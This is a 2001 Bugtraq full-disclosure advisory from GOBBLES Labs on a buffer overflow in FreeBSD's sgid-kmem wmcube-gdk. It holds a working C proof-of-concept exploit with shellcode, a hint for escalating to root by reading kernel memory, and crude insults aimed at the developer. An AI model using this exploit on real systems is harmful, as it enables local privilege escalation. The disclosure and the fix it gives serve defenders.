New Advisory + Exploit
Date: Mon, 17 Dec 2001 23:13:39 GMT
From: bugtraq <bugtraq@bugtraq.org>
To: bugtraq@securityfocus.com, vuln-watch@vulnwatch.org
Subject: New Advisory + Exploit
--=_0_21988_1008630830
Content-Type: text/plain; format=flowed; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Hello everyone.
GOBBLES Labs proudly presents yet another advisory + exploit. Today's
product is wmcube-gdk, which is sgid(kmem) after installation from
FreeBSD's Ports collection. After successful exploitation of the bug,
gaining root privilages is trivial. See attached advisory for details.
GOBBLES Labs
http://www.bugtraq.org
--=_0_21988_1008630830
Content-Disposition: attachment; filename="GOBBLES-13.txt"
Content-Type: text/plain; charset="iso-8859-1"; name="GOBBLES-13.txt"
Content-Transfer-Encoding: 7bit
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++
ALERT! ALERT! FREEBSD LOCAL ROOT VULNERABILITY! ALERT! ALERT!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include "/var/spool/uucppublic/.gbbls/note.h"
"Love doesn't make the world go 'round,
love is what makes the ride worthwhile."
Alicia is in love!!! ---^
GOBBLES and he group do proudly present advisory on local root hole in
FreeBSD that can also work for the Linux, but GOBBLES did find hole when
doing comprehensive ports audit. GOBBLES didn't see any real need to
waste time on crappy program exploits for other operating systems and
suspect this one is enough to teach programmer timecop lesson in manners
and one in humility.
PRODUCT
*******
Program:
-r-xr-sr-x 1 root kmem 20376 Dec 17 11:28 /usr/X11R6/bin/wmcube-gdk
FreeBSD port:
/usr/ports/sysutils/wmcube-gdk
Author WWW:
http://www.ne.jp/asahi/linux/timecop/
BACKGROUND
**********
GOBBLES crack he knuckles as he prepare to exercise copy/paste talent then
does submit the following to eyes of eager readers:
WMCube / GDK
This is modified and optimized version of wmCube 0.98, originally
available at this website.
Changes include much faster redraws, significantly lower CPU usage, ability
to specify color for both flat-shaded and wireframe objects, and transparent
CPU load / zoom buttons. Sorry, the "roll-in" sequence of original wmCube
has been removed. But with all these cool new features it's unlikely you
are going to miss it too long :) wmCube author is too busy to look over
my changes, so I am making them available here, with his approval :)
Note, Makefiles for systems other than Linux will need to be modified to
use gdk libraries. Check out README.GDK inside the tarball for some hints
where to start. If you make changes for your system, please send me
updated Makefile. Thank you.
PROBLEM
*******
GOBBLES notice user can specify object description file which overflow
small buffer which then transform wmcube-gdk into swiss army knife with
gid(kmem) privs. For all critics who say, "this not root if it only
gid(kmem)!" GOBBLES say, "Go back to security-basic mailing list to learn
trick for quickly becoming uid(root) on the FreeBSD and other OS when you
have gid(kmem). GOBBLES think that all people who quick to criticize
GOBBLES when all he really doing is saying things in tricky way to invite
criticism from ignorant so that GOBBLES can mock them are just complete
idiots who spend way too much time trying to get three years of "security
experience" so they can go take 250 question CISSP test and then let the
world know on mailing lists that they have elite whitehat pussy ethical
hacker with no skill certification (which is what CISSP stand
for). Anyhow, you idiots know who you are, and beware that any mockery of
GOBBLES by inexperienced and unskilled critics who brag certifications
will not be accepted, dummies. Hehehe GOBBLES got off on a little dark
tangent from he speech and will now get back to original subject, which is
local root exploit in wmcube-gdk.
Funny thing that GOBBLES did notice is that wmcube program that wmcube-gdk
is based off is not vulnerable to this bug (but is to others, go do
sourcecode audit before GOBBLES make monkey out of you!), so the fault is
entirely belonging to programmer timecop... encourage him to stop writing
code with silly beginner style mistakes. Stupid mistakes made by stupid
beginner programmer.
VENDOR NOTIFICATION STATUS
**************************
GOBBLES first do privmsg timecop: identify tricks on efnet with long
string to see who make right rules for Ettercap exploit (snort.org
official ones worthless, but idiot criticize us!) hehe then GOBBLES did
proceed to try and discuss issue with programmer timecop but did not get
any response from selfrighteous bastard so oh well GOBBLES not really
caring to help anymore. Important for software programmers to all be
active subscribers and contributers to securityfocus.com mailing lists so
they can find out about earthshattering bugs that indirectly affect their
code and then can go audit and fix new bugs, understand what GOBBLES wants
you developers all to do?
TECHNICAL DETAILS
*****************
Here problem GOBBLES did spot in wmcube.c, in the function loadobj().
int loadobj(char *filename)
{
FILE *fp;
char tmp[64] = { "" };
int i = 0, counter = 1;
10:
...
fscanf(fp, "%s", tmp);
...
goto 10;
}
As you can see, programmer pick to chose data in 64 bytes small buffer,
which is OK but the problem is the fscanf(fp, "s", tmp); trick used
multiple times in code he make of loadobj(). Bad decision by newbie
programmer who do not understand that penetrator can specify own object
description file with -o argument and put long lines in it and then
overflowing 64 byte buffer! Good thing GOBBLES catch all bugs in
software, hehe!
WORKAROUND
**********
[0x01]
Shutdown your computer until a official fix is available..
..OR..
[0x02]
Replace fscanf(fp, "%s", tmp); in loadobj(), wmcube.c with
fgets(tmp, 64, fp);.
Then uninstall bad wmcube-gdk, recompile and do a new install!
DEMONSTRATION
*************
GOBBLES do some more copy/paste acrobatics to show better idea of how this
vulnerability exists and stuff.
<snip>
===> Registering installation for wmcube-gdk-0.98p1
===> SECURITY NOTE:
This port has installed the following binaries which execute with
increased privileges.
667014 40 -r-xr-sr-x 1 root kmem 20376 Dec 17 09:43 /usr/X11R6/bin/wmcube-gdk
If there are vulnerabilities in these programs there may be a security
risk to the system. FreeBSD makes no guarantee about the security of
ports included in the Ports Collection. Please type 'make deinstall'
to deinstall the port if this is a concern.
For more information, and contact details about the security
status of this software, see the following webpage:
http://www.ne.jp/asahi/linux/timecop/
</snip>
GOBBLES@freegobbles:~$ ./GOBBLESwmc # GOBBLES whitehat PoC exploit
GOBBLES!
uid=1001(GOBBLES) gid=1001(GOBBLES) groups=1001(GOBBLES), 2(kmem)
GOBBLES@freegobbles:~$
As you can see, GOBBLES had Andrew write pussy whitehat style PoC exploit
to keep penetrators from using it maliciously (GOBBLES certain this futile
effort to keep weapons out of penetrator hands though, since someone will
undoubtedly "fix" exploit then republish it showing how smart they are for
being able to "fix" simple things, idiots not understanding the reason for
distributing in PoC format).
CONCLUSION
**********
Since there is security vulnerability in sgid kmem program GOBBLES decide
to deinstall package so no evil penetrators may sneak into GOBBLES private
kernel memory$!@#%.
root@freegobbles:/usr/ports/sysutils/wmcube-gdk# make deinstall
===> Deinstalling for wmcube-gdk-0.98p1
root@freegobbles:/usr/ports/sysutils/wmcube-gdk#
Now, GOBBLES feels much safer, hehehe.
So, what GOBBLES learn this time?
Fancy program might not be secure! Similar to philosophy of writing
exploits in penetrator program Ettercap, but slightly different since
wmcube-gdk just fancy program, and not evil penetrator program, hehe.
POC EXPLOIT
***********
This hole give root indirectly after getting gid(kmem). GOBBLES suggest
trying strings in memory to find master.password then using Mickey Mouse
Hacking Squadron UnicOS exploits to gain root on Cray's to do password
cracking to get root, then do su root - trick to get root on
machine. From GOBBLES extensive research into subject matter of root
password he find that most FreeBSD root password are "love", but that is
not GOBBLES root password so do not even try, hehe!
This time GOBBLES choose to not include shellcode that execve() /bin/bash
so FreeBSD admin can feel safe until author patches he program!
/*
* (c) Andrew / GOBBLES Security
*
* PoC exploit for wmcube-gdk
*
* Usage: /path/to/GOBBLES-wmcube-gdk-exploit [offset]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
unsigned char GOBBLES_shellcode[] =
"\xb8\xf5\xf5\xff\xff\xf7\xd0\x50\xb8\xb3\xba\xac\xde\xf7\xd0\x50"
"\xb8\xb8\xb0\xbd\xbd\xf7\xd0\x50\x89\xe6\x31\xc0\x31\xdb\xb0\xf5"
"\xf6\xd0\x50\x56\x53\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";
int main(int argc, char **argv) {
FILE *fd;
int i;
u_long retaddy = 0xbfbff634;
if(argc == 2)
retaddy += atoi(argv[1]);
fd = fopen(".gobbles", "wt");
fprintf(fd, "WMCUBE_COORDINATES\n");
fprintf(fd, "1aaa"); // atoi()..
for(i = 0; i < 64; i += 8)
fprintf(fd, "GOBBLES!");
printf("GOBBLES: Using %lx as retaddy\n", retaddy);
fflush(NULL);
fwrite(&retaddy, 4, 1, fd);
fprintf(fd, "GOBBLES!");
fprintf(fd, "GOBBLES!");
fprintf(fd, "%s", GOBBLES_shellcode);
fprintf(fd, " 0 -42 42\n");
fprintf(fd, "WMCUBE_LINES\n");
fprintf(fd, "1 1\n");
fclose(fd);
execl("/usr/X11R6/bin/wmcube-gdk", "wmcube-gdk", "-o", ".gobbles", 0);
unlink(".gobbles"); /* Mum always told me to cleanup when im done! */
fprintf(stderr, "System immune against GOBBLES exploit!\n");
return 0;
}
GREETS
******
dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble,
knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org,
blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet,
bugtraq (thanks aleph1 and david ahmad for devoting your time to a great
list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin
bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley,
manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens,
radiohead, george michael, larry wall, beethoven, francis bacon, bruce
willis, bruce schneier, alan turing, john von neumann, donald knuth, michael
abrash, robert sedgewick, richard simmons, government boy, ralph lauren,
kevin mitnick, david koresh, the violent femmes, legions of doom, quentin
tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky,
hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock,
ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer
lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci,
nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo
dolls, savage garden, george bush, john howard, tony blair, ashida kim,
andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi,
deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster,
attrition.org, cliff stoll, bill gates, alan cox, george harrison,
berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru
paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captian
crunch, tony the tiger, julliette lewis, oliver twist, yakko, wakko (but
no dot), santa claus, the easter bunny, the christmas tree, hacktech.org,
mixter and the rest of #darknet/2xs, the planet Pluto, pluto the dog (from
walt disney), walt disney, the smurfs, packetstormsecurity.org, chocolate,
caramel, marshmallows, rice crispies, rice crispie treats, cousin WOBBLES,
rfp, Alan@packetstorm, george bush senior, george w. bush, his drunken
daughters, gary coleman, fat albert, rhino9, eEye.com (hehe good work on
application firewall thing or whatever), the djali zwan, digital unix,
o'reilly & associates (smart folk selling sketches on cover of book filled
with printed manpages with little bit of funny jokes, hehe they rich now),
hwa-security.net, #malvu/efnet, donkey kong, diddy kong, p diddy (GOBBLES
not understand the english in this name? but he good artist anyway), mr.
peanut, all girls who pose naked on webcam for GOBBLES, mr goldilocks (you
memory live on forever, old chum), checkpoint.com (thank you for free stuff
like nice new shirt and pen and golf tees that all say Checkpoint, hehe),
whoever invented deoderant, monkey.org, and all our friends and family.
GOBBLES SECURITY
http://www.bugtraq.org/
--=_0_21988_1008630830--